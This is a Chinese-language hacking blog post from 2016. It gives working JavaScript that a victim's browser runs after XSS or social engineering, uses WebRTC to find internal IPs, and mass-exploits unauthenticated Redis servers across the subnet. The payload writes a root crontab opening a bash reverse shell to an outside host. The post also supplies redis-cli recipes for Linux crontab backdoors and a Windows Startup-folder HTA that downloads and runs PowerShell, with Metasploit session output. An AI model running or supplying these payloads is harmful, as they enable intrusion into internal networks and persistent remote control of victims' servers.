2016年7月

利用xss或者社工让对方点我的链接,然后利用js自动化攻击内网redis,

利用redis写任务计划批量反弹shell。

js扫内网6379不太好实现,就不进行端口探测了,直接对整个网段执行一遍exp

利用如下代码获取内网ip段:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    ipList = []
    var webrtcxss = {
    webrtc        : function(callback){
        var ip_dups           = {};
        var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        var mediaConstraints  = {
            optional: [{RtpDataChannels: true}]
        };
        var servers = undefined;
        if(window.webkitRTCPeerConnection){
            servers = {iceServers: []};
        }
        var pc = new RTCPeerConnection(servers, mediaConstraints);
        pc.onicecandidate = function(ice){
            if(ice.candidate){
                var ip_regex        = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                var ip_addr         = ip_regex.exec(ice.candidate.candidate)[1]; 
                if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
                ip_dups[ip_addr]    = true;
            }
        };
        pc.createDataChannel("");
        pc.createOffer(function(result){
            pc.setLocalDescription(result, function(){});
        });
    },
    getIp        : function(){
        this.webrtc(function(ip){
            ipList.push(ip);
        });
    }
}
webrtcxss.getIp()
setTimeout(function() {
    alert(ipList)
}, 300)
</script>
</html>

 

效果如下图

 

利用ajax攻击redis原理:

参考文章:http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/

https://www.t00ls.net/thread-34873-1-1.html

http://www.freebuf.com/articles/web/19622.html

 

下面是一个ajax操作redis写任务计划反弹的例子:

var ip = '192.168.203.2';
var port= '6379';
var dir = '/var/spool/cron/';
var filename = 'root';
var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
var url = "http://" + ip + ":" + port;

var cmd = new XMLHttpRequest();
cmd.open("POST",  url);
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
 
var cmd = new XMLHttpRequest();
cmd.open("POST",  url);
cmd.send('save\r\n');

 

最后来实现自动获取内网ip,自动批量攻击内网1-255的ip

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    ipList = []
    var webrtcxss = {
    webrtc        : function(callback){
        var ip_dups           = {};
        var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        var mediaConstraints  = {
            optional: [{RtpDataChannels: true}]
        };
        var servers = undefined;
        if(window.webkitRTCPeerConnection){
            servers = {iceServers: []};
        }
        var pc = new RTCPeerConnection(servers, mediaConstraints);
        pc.onicecandidate = function(ice){
            if(ice.candidate){
                var ip_regex        = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                var ip_addr         = ip_regex.exec(ice.candidate.candidate)[1]; 
                if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
                ip_dups[ip_addr]    = true;
            }
        };
        pc.createDataChannel("");
        pc.createOffer(function(result){
            pc.setLocalDescription(result, function(){});
        });
    },
    getIp        : function(){
        this.webrtc(function(ip){
            ipList.push(ip);
        });
    }
}
webrtcxss.getIp()
setTimeout(function() {
    for(var i in ipList) {
        if(ipList[i]) {
            var iparr = ipList[i].split(".");
            for(var i=0;i<255;i++) {
                var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
                send(attkip);
            }
        }
    }
}, 300);

function send(ip) {
    var port= '6379';
    var dir = '/var/spool/cron/';
    var filename = 'root';
    var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
    var url = "http://" + ip + ":" + port;

    var cmd = new XMLHttpRequest();
    cmd.open("POST",  url);
    cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
     
    var cmd = new XMLHttpRequest();
    cmd.open("POST",  url);
    cmd.send('save\r\n');
    
}

</script>
</html>

如果嫌1-255不够可以再加一个for循环

 

自动向内网redis发送攻击代码

然后在自己的服务器中用nc监听你设置的端口,然后你会发现服务器已经躺在这了

ok

 

 

测试模块已加入xss平台:http://xss.phpinfo.me/

redis

linux利用(转自wooyun)

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 'ringzero',这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save

# 利用crontab创建文件 /tmp/888

redis-cli flushall # 为了方便测试 
redis-cli set test 'test' 
redis-cli set my 'mymymymymymymymymymymymy' 
redis-cli set word 'wordwordwordwordwordword' 
redis-cli set hello 'ringzero' 
redis-cli set word1 'word1word1word1word1word1word1' 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save
redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save

# 二次改写crontab

redis-cli flushall 
redis-cli set 2 ';a=`redis-cli get c`;' 
redis-cli set 1 'id;redis-cli set r `$a`;#' 
redis-cli config set dir /tmp/ 
redis-cli config set dbfilename w 
redis-cli save 
redis-cli set c whoami

# 利用第一步的写crontab步骤,完成下面的命令

echo " " > /tmp/zz 
cat /tmp/w >> /tmp/zz 
/bin/sh /tmp/zz 
redis-cli get r

控制 /var/spool/cron/root 和 /tmp/zz

# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r

* * * * * sleep 10;/bin/sh /tmp/zz

windows利用方式(转自90sec)

redis 官方未发布windows版本,但是野外存在redis/win版本。

在测试时发现一windows版本redis,遂开始搞。

直接上利用,基于msf:

root@weisuo.org:~# cat hta-psh.txt 
 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
[url=mailto:root@weisuo.org]root@weisuo.org[/url]:~#  cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK

hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。

#msfconsole 
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#之后起个handle,略

修改1.ps1,文件内容大概如下:

$command="powershell -nop -w hidden -e xxxxxxxxxxxxxxxx";iex $command;$command2="taskkill /im mshta.exe";iex $command2;

最后写入文件,等待管理员登陆

oot@xxx:~# redis-cli -h 192.168.138.27
redis 192.168.138.27:6379> CONFIG GET dir
1) "dir"
2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
redis 192.168.138.27:6379> config get dbfilename
1) "dbfilename"
2) "2.hta"
redis 192.168.138.27:6379> save
OK
redis 192.168.138.27:6379>[/p][p=20, null, left]

 

msf exploit(handler) > rexploit -j -z
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on x.x.x.x:80
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to x.x.x.x
[*] Meterpreter session 4 opened (x.x.x.x:80 -> x.x.x.x:56301) at 2016-06-06 11:06:00 -0400
[*] Session ID 4 (x.x.x.x:80 -> x.x.x.x:56301) processing AutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (4896)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3768
[+] Successfully migrated to process